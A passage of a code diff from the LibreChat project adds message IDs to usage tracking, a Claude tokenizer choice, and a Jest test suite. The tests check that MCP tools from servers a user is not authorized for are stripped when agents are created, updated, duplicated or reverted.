'[api/server/controllers/agents/client.js #titleConvo] Error recording collected usage',
|
||||||
|
|
@ -1185,6 +1139,7 @@ class AgentClient extends BaseClient {
|
||||||
model,
|
model,
|
||||||
context,
|
context,
|
||||||
balance,
|
balance,
|
||||||
|
messageId: this.responseMessageId,
|
||||||
conversationId: this.conversationId,
|
conversationId: this.conversationId,
|
||||||
user: this.user ?? this.options.req.user?.id,
|
user: this.user ?? this.options.req.user?.id,
|
||||||
endpointTokenConfig: this.options.endpointTokenConfig,
|
endpointTokenConfig: this.options.endpointTokenConfig,
|
||||||
|
|
@ -1203,6 +1158,7 @@ class AgentClient extends BaseClient {
|
||||||
model,
|
model,
|
||||||
balance,
|
balance,
|
||||||
context: 'reasoning',
|
context: 'reasoning',
|
||||||
|
messageId: this.responseMessageId,
|
||||||
conversationId: this.conversationId,
|
conversationId: this.conversationId,
|
||||||
user: this.user ?? this.options.req.user?.id,
|
user: this.user ?? this.options.req.user?.id,
|
||||||
endpointTokenConfig: this.options.endpointTokenConfig,
|
endpointTokenConfig: this.options.endpointTokenConfig,
|
||||||
|
|
@ -1218,7 +1174,11 @@ class AgentClient extends BaseClient {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/** Anthropic Claude models use a distinct BPE tokenizer; all others default to o200k_base. */
|
||||||
getEncoding() {
|
getEncoding() {
|
||||||
|
if (this.model && this.model.toLowerCase().includes('claude')) {
|
||||||
|
return 'claude';
|
||||||
|
}
|
||||||
return 'o200k_base';
|
return 'o200k_base';
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -263,6 +263,7 @@ describe('AgentClient - titleConvo', () => {
|
||||||
transactions: {
|
transactions: {
|
||||||
enabled: true,
|
enabled: true,
|
||||||
},
|
},
|
||||||
|
messageId: 'response-123',
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
|
|
||||||
677
api/server/controllers/agents/filterAuthorizedTools.spec.js
Normal file
677
api/server/controllers/agents/filterAuthorizedTools.spec.js
Normal file
|
|
@ -0,0 +1,677 @@
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const { v4: uuidv4 } = require('uuid');
|
||||||
|
const { Constants } = require('librechat-data-provider');
|
||||||
|
const { agentSchema } = require('@librechat/data-schemas');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
|
||||||
|
const d = Constants.mcp_delimiter;
|
||||||
|
|
||||||
|
const mockGetAllServerConfigs = jest.fn();
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Config', () => ({
|
||||||
|
getCachedTools: jest.fn().mockResolvedValue({
|
||||||
|
web_search: true,
|
||||||
|
execute_code: true,
|
||||||
|
file_search: true,
|
||||||
|
}),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/config', () => ({
|
||||||
|
getMCPServersRegistry: jest.fn(() => ({
|
||||||
|
getAllServerConfigs: mockGetAllServerConfigs,
|
||||||
|
})),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Project', () => ({
|
||||||
|
getProjectByName: jest.fn().mockResolvedValue(null),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/strategies', () => ({
|
||||||
|
getStrategyFunctions: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/images/avatar', () => ({
|
||||||
|
resizeAvatar: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/S3/crud', () => ({
|
||||||
|
refreshS3Url: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/process', () => ({
|
||||||
|
filterFile: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Action', () => ({
|
||||||
|
updateAction: jest.fn(),
|
||||||
|
getActions: jest.fn().mockResolvedValue([]),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/File', () => ({
|
||||||
|
deleteFileByFilter: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/PermissionService', () => ({
|
||||||
|
findAccessibleResources: jest.fn().mockResolvedValue([]),
|
||||||
|
findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
|
||||||
|
grantPermission: jest.fn(),
|
||||||
|
hasPublicPermission: jest.fn().mockResolvedValue(false),
|
||||||
|
checkPermission: jest.fn().mockResolvedValue(true),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
getCategoriesWithCounts: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/cache', () => ({
|
||||||
|
getLogStores: jest.fn(() => ({
|
||||||
|
get: jest.fn(),
|
||||||
|
set: jest.fn(),
|
||||||
|
delete: jest.fn(),
|
||||||
|
})),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const {
|
||||||
|
filterAuthorizedTools,
|
||||||
|
createAgent: createAgentHandler,
|
||||||
|
updateAgent: updateAgentHandler,
|
||||||
|
duplicateAgent: duplicateAgentHandler,
|
||||||
|
revertAgentVersion: revertAgentVersionHandler,
|
||||||
|
} = require('./v1');
|
||||||
|
|
||||||
|
const { getMCPServersRegistry } = require('~/config');
|
||||||
|
|
||||||
|
let Agent;
|
||||||
|
|
||||||
|
describe('MCP Tool Authorization', () => {
|
||||||
|
let mongoServer;
|
||||||
|
let mockReq;
|
||||||
|
let mockRes;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
const mongoUri = mongoServer.getUri();
|
||||||
|
await mongoose.connect(mongoUri);
|
||||||
|
Agent = mongoose.models.Agent || mongoose.model('Agent', agentSchema);
|
||||||
|
}, 20000);
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await Agent.deleteMany({});
|
||||||
|
jest.clearAllMocks();
|
||||||
|
|
||||||
|
getMCPServersRegistry.mockImplementation(() => ({
|
||||||
|
getAllServerConfigs: mockGetAllServerConfigs,
|
||||||
|
}));
|
||||||
|
mockGetAllServerConfigs.mockResolvedValue({
|
||||||
|
authorizedServer: { type: 'sse', url: 'https://authorized.example.com' },
|
||||||
|
anotherServer: { type: 'sse', url: 'https://another.example.com' },
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq = {
|
||||||
|
user: {
|
||||||
|
id: new mongoose.Types.ObjectId().toString(),
|
||||||
|
role: 'USER',
|
||||||
|
},
|
||||||
|
body: {},
|
||||||
|
params: {},
|
||||||
|
query: {},
|
||||||
|
app: { locals: { fileStrategy: 'local' } },
|
||||||
|
};
|
||||||
|
|
||||||
|
mockRes = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn().mockReturnThis(),
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('filterAuthorizedTools', () => {
|
||||||
|
const availableTools = { web_search: true, custom_tool: true };
|
||||||
|
const userId = 'test-user-123';
|
||||||
|
|
||||||
|
test('should keep authorized MCP tools and strip unauthorized ones', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`, 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toContain(`toolA${d}authorizedServer`);
|
||||||
|
expect(result).toContain('web_search');
|
||||||
|
expect(result).not.toContain(`toolB${d}forbiddenServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should keep system tools without querying MCP registry', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: ['execute_code', 'file_search', 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools: {},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual(['execute_code', 'file_search', 'web_search']);
|
||||||
|
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should not query MCP registry when no MCP tools are present', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: ['web_search', 'custom_tool'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual(['web_search', 'custom_tool']);
|
||||||
|
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should filter all MCP tools when registry is uninitialized', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [`toolA${d}someServer`, 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual(['web_search']);
|
||||||
|
expect(result).not.toContain(`toolA${d}someServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should handle mixed authorized and unauthorized MCP tools', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [
|
||||||
|
'web_search',
|
||||||
|
`search${d}authorizedServer`,
|
||||||
|
`attack${d}victimServer`,
|
||||||
|
'execute_code',
|
||||||
|
`list${d}anotherServer`,
|
||||||
|
`steal${d}nonexistent`,
|
||||||
|
],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([
|
||||||
|
'web_search',
|
||||||
|
`search${d}authorizedServer`,
|
||||||
|
'execute_code',
|
||||||
|
`list${d}anotherServer`,
|
||||||
|
]);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should handle empty tools array', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([]);
|
||||||
|
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should handle null/undefined tool entries gracefully', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [null, undefined, '', 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual(['web_search']);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should call getAllServerConfigs with the correct userId', async () => {
|
||||||
|
await filterAuthorizedTools({
|
||||||
|
tools: [`tool${d}authorizedServer`],
|
||||||
|
userId: 'specific-user-id',
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockGetAllServerConfigs).toHaveBeenCalledWith('specific-user-id');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should only call getAllServerConfigs once even with multiple MCP tools', async () => {
|
||||||
|
await filterAuthorizedTools({
|
||||||
|
tools: [`tool1${d}authorizedServer`, `tool2${d}anotherServer`, `tool3${d}unknownServer`],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockGetAllServerConfigs).toHaveBeenCalledTimes(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve existing MCP tools when registry is unavailable', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
const existingTools = [`toolA${d}serverA`, `toolB${d}serverB`];
|
||||||
|
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [...existingTools, `newTool${d}unknownServer`, 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
existingTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toContain(`toolA${d}serverA`);
|
||||||
|
expect(result).toContain(`toolB${d}serverB`);
|
||||||
|
expect(result).toContain('web_search');
|
||||||
|
expect(result).not.toContain(`newTool${d}unknownServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should still reject all MCP tools when registry is unavailable and no existingTools', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [`toolA${d}serverA`, 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual(['web_search']);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should not preserve malformed existing tools when registry is unavailable', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
const malformedTool = `a${d}b${d}c`;
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [malformedTool, `legit${d}serverA`, 'web_search'],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
existingTools: [malformedTool, `legit${d}serverA`],
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toContain(`legit${d}serverA`);
|
||||||
|
expect(result).toContain('web_search');
|
||||||
|
expect(result).not.toContain(malformedTool);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should reject malformed MCP tool keys with multiple delimiters', async () => {
|
||||||
|
const result = await filterAuthorizedTools({
|
||||||
|
tools: [
|
||||||
|
`attack${d}victimServer${d}authorizedServer`,
|
||||||
|
`legit${d}authorizedServer`,
|
||||||
|
`a${d}b${d}c${d}d`,
|
||||||
|
'web_search',
|
||||||
|
],
|
||||||
|
userId,
|
||||||
|
availableTools,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([`legit${d}authorizedServer`, 'web_search']);
|
||||||
|
expect(result).not.toContainEqual(expect.stringContaining('victimServer'));
|
||||||
|
expect(result).not.toContainEqual(expect.stringContaining(`a${d}b`));
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('createAgentHandler - MCP tool authorization', () => {
|
||||||
|
test('should strip unauthorized MCP tools on create', async () => {
|
||||||
|
mockReq.body = {
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
name: 'MCP Test Agent',
|
||||||
|
tools: ['web_search', `validTool${d}authorizedServer`, `attack${d}forbiddenServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await createAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
const agent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(agent.tools).toContain('web_search');
|
||||||
|
expect(agent.tools).toContain(`validTool${d}authorizedServer`);
|
||||||
|
expect(agent.tools).not.toContain(`attack${d}forbiddenServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should not 500 when MCP registry is uninitialized', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.body = {
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
name: 'MCP Uninitialized Test',
|
||||||
|
tools: [`tool${d}someServer`, 'web_search'],
|
||||||
|
};
|
||||||
|
|
||||||
|
await createAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
const agent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(agent.tools).toEqual(['web_search']);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should store mcpServerNames only for authorized servers', async () => {
|
||||||
|
mockReq.body = {
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
name: 'MCP Names Test',
|
||||||
|
tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await createAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
const agent = mockRes.json.mock.calls[0][0];
|
||||||
|
const agentInDb = await Agent.findOne({ id: agent.id });
|
||||||
|
expect(agentInDb.mcpServerNames).toContain('authorizedServer');
|
||||||
|
expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('updateAgentHandler - MCP tool authorization', () => {
|
||||||
|
let existingAgentId;
|
||||||
|
let existingAgentAuthorId;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
existingAgentAuthorId = new mongoose.Types.ObjectId();
|
||||||
|
const agent = await Agent.create({
|
||||||
|
id: `agent_${uuidv4()}`,
|
||||||
|
name: 'Original Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: existingAgentAuthorId,
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`],
|
||||||
|
mcpServerNames: ['authorizedServer'],
|
||||||
|
versions: [
|
||||||
|
{
|
||||||
|
name: 'Original Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`],
|
||||||
|
createdAt: new Date(),
|
||||||
|
updatedAt: new Date(),
|
||||||
|
},
|
||||||
|
],
|
||||||
|
});
|
||||||
|
existingAgentId = agent.id;
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve existing MCP tools even if editor lacks access', async () => {
|
||||||
|
mockGetAllServerConfigs.mockResolvedValue({});
|
||||||
|
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = {
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const updatedAgent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
|
||||||
|
expect(updatedAgent.tools).toContain('web_search');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should reject newly added unauthorized MCP tools', async () => {
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = {
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`, `attack${d}forbiddenServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const updatedAgent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(updatedAgent.tools).toContain('web_search');
|
||||||
|
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
|
||||||
|
expect(updatedAgent.tools).not.toContain(`attack${d}forbiddenServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should allow adding authorized MCP tools', async () => {
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = {
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`, `newTool${d}anotherServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const updatedAgent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(updatedAgent.tools).toContain(`newTool${d}anotherServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should not query MCP registry when no new MCP tools added', async () => {
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = {
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockGetAllServerConfigs).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve existing MCP tools when registry unavailable and user edits agent', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = {
|
||||||
|
name: 'Renamed After Restart',
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const updatedAgent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
|
||||||
|
expect(updatedAgent.tools).toContain('web_search');
|
||||||
|
expect(updatedAgent.name).toBe('Renamed After Restart');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve existing MCP tools when server not in configs (disconnected)', async () => {
|
||||||
|
mockGetAllServerConfigs.mockResolvedValue({});
|
||||||
|
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = {
|
||||||
|
name: 'Edited While Disconnected',
|
||||||
|
tools: ['web_search', `existingTool${d}authorizedServer`],
|
||||||
|
};
|
||||||
|
|
||||||
|
await updateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const updatedAgent = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`);
|
||||||
|
expect(updatedAgent.name).toBe('Edited While Disconnected');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('duplicateAgentHandler - MCP tool authorization', () => {
|
||||||
|
let sourceAgentId;
|
||||||
|
let sourceAgentAuthorId;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
sourceAgentAuthorId = new mongoose.Types.ObjectId();
|
||||||
|
const agent = await Agent.create({
|
||||||
|
id: `agent_${uuidv4()}`,
|
||||||
|
name: 'Source Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: sourceAgentAuthorId,
|
||||||
|
tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`],
|
||||||
|
mcpServerNames: ['authorizedServer', 'forbiddenServer'],
|
||||||
|
versions: [
|
||||||
|
{
|
||||||
|
name: 'Source Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`],
|
||||||
|
createdAt: new Date(),
|
||||||
|
updatedAt: new Date(),
|
||||||
|
},
|
||||||
|
],
|
||||||
|
});
|
||||||
|
sourceAgentId = agent.id;
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should strip unauthorized MCP tools from duplicated agent', async () => {
|
||||||
|
mockGetAllServerConfigs.mockResolvedValue({
|
||||||
|
authorizedServer: { type: 'sse' },
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.user.id = sourceAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = sourceAgentId;
|
||||||
|
|
||||||
|
await duplicateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
const { agent: newAgent } = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(newAgent.id).not.toBe(sourceAgentId);
|
||||||
|
expect(newAgent.tools).toContain('web_search');
|
||||||
|
expect(newAgent.tools).toContain(`tool${d}authorizedServer`);
|
||||||
|
expect(newAgent.tools).not.toContain(`tool${d}forbiddenServer`);
|
||||||
|
|
||||||
|
const agentInDb = await Agent.findOne({ id: newAgent.id });
|
||||||
|
expect(agentInDb.mcpServerNames).toContain('authorizedServer');
|
||||||
|
expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve source agent MCP tools when registry is unavailable', async () => {
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.user.id = sourceAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = sourceAgentId;
|
||||||
|
|
||||||
|
await duplicateAgentHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.status).toHaveBeenCalledWith(201);
|
||||||
|
const { agent: newAgent } = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(newAgent.tools).toContain('web_search');
|
||||||
|
expect(newAgent.tools).toContain(`tool${d}authorizedServer`);
|
||||||
|
expect(newAgent.tools).toContain(`tool${d}forbiddenServer`);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('revertAgentVersionHandler - MCP tool authorization', () => {
|
||||||
|
let existingAgentId;
|
||||||
|
let existingAgentAuthorId;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
existingAgentAuthorId = new mongoose.Types.ObjectId();
|
||||||
|
const agent = await Agent.create({
|
||||||
|
id: `agent_${uuidv4()}`,
|
||||||
|
name: 'Reverted Agent V2',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: existingAgentAuthorId,
|
||||||
|
tools: ['web_search'],
|
||||||
|
versions: [
|
||||||
|
{
|
||||||
|
name: 'Reverted Agent V1',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: ['web_search', `oldTool${d}revokedServer`],
|
||||||
|
createdAt: new Date(Date.now() - 10000),
|
||||||
|
updatedAt: new Date(Date.now() - 10000),
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: 'Reverted Agent V2',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: ['web_search'],
|
||||||
|
createdAt: new Date(),
|
||||||
|
updatedAt: new Date(),
|
||||||
|
},
|
||||||
|
],
|
||||||
|
});
|
||||||
|
existingAgentId = agent.id;
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should strip unauthorized MCP tools after reverting to a previous version', async () => {
|
||||||
|
mockGetAllServerConfigs.mockResolvedValue({
|
||||||
|
authorizedServer: { type: 'sse' },
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = { version_index: 0 };
|
||||||
|
|
||||||
|
await revertAgentVersionHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const result = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(result.tools).toContain('web_search');
|
||||||
|
expect(result.tools).not.toContain(`oldTool${d}revokedServer`);
|
||||||
|
|
||||||
|
const agentInDb = await Agent.findOne({ id: existingAgentId });
|
||||||
|
expect(agentInDb.tools).toContain('web_search');
|
||||||
|
expect(agentInDb.tools).not.toContain(`oldTool${d}revokedServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should keep authorized MCP tools after revert', async () => {
|
||||||
|
await Agent.updateOne(
|
||||||
|
{ id: existingAgentId },
|
||||||
|
{ $set: { 'versions.0.tools': ['web_search', `tool${d}authorizedServer`] } },
|
||||||
|
);
|
||||||
|
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = { version_index: 0 };
|
||||||
|
|
||||||
|
await revertAgentVersionHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const result = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(result.tools).toContain('web_search');
|
||||||
|
expect(result.tools).toContain(`tool${d}authorizedServer`);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should preserve version MCP tools when registry is unavailable on revert', async () => {
|
||||||
|
await Agent.updateOne(
|
||||||
|
{ id: existingAgentId },
|
||||||
|
{
|
||||||
|
$set: {
|
||||||
|
'versions.0.tools': [
|
||||||
|
'web_search',
|
||||||
|
`validTool${d}authorizedServer`,
|
||||||
|
`otherTool${d}anotherServer`,
|
||||||
|
],
|
||||||
|
},
|
||||||
|
},
|
||||||
|
);
|
||||||
|
|
||||||
|
getMCPServersRegistry.mockImplementation(() => {
|
||||||
|
throw new Error('MCPServersRegistry has not been initialized.');
|
||||||
|
});
|
||||||
|
|
||||||
|
mockReq.user.id = existingAgentAuthorId.toString();
|
||||||
|
mockReq.params.id = existingAgentId;
|
||||||
|
mockReq.body = { version_index: 0 };
|
||||||
|
|
||||||
|
await revertAgentVersionHandler(mockReq, mockRes);
|
||||||
|
|
||||||
|
expect(mockRes.json).toHaveBeenCalled();
|
||||||
|
const result = mockRes.json.mock.calls[0][0];
|
||||||
|
expect(result.tools).toContain('web_search');
|
||||||
|
expect(result.tools).toContain(`validTool${d}authorizedServer`);
|
||||||
|
expect(result.tools).toContain(`otherTool${d}anotherServer`);
|
||||||
|
|
||||||
|
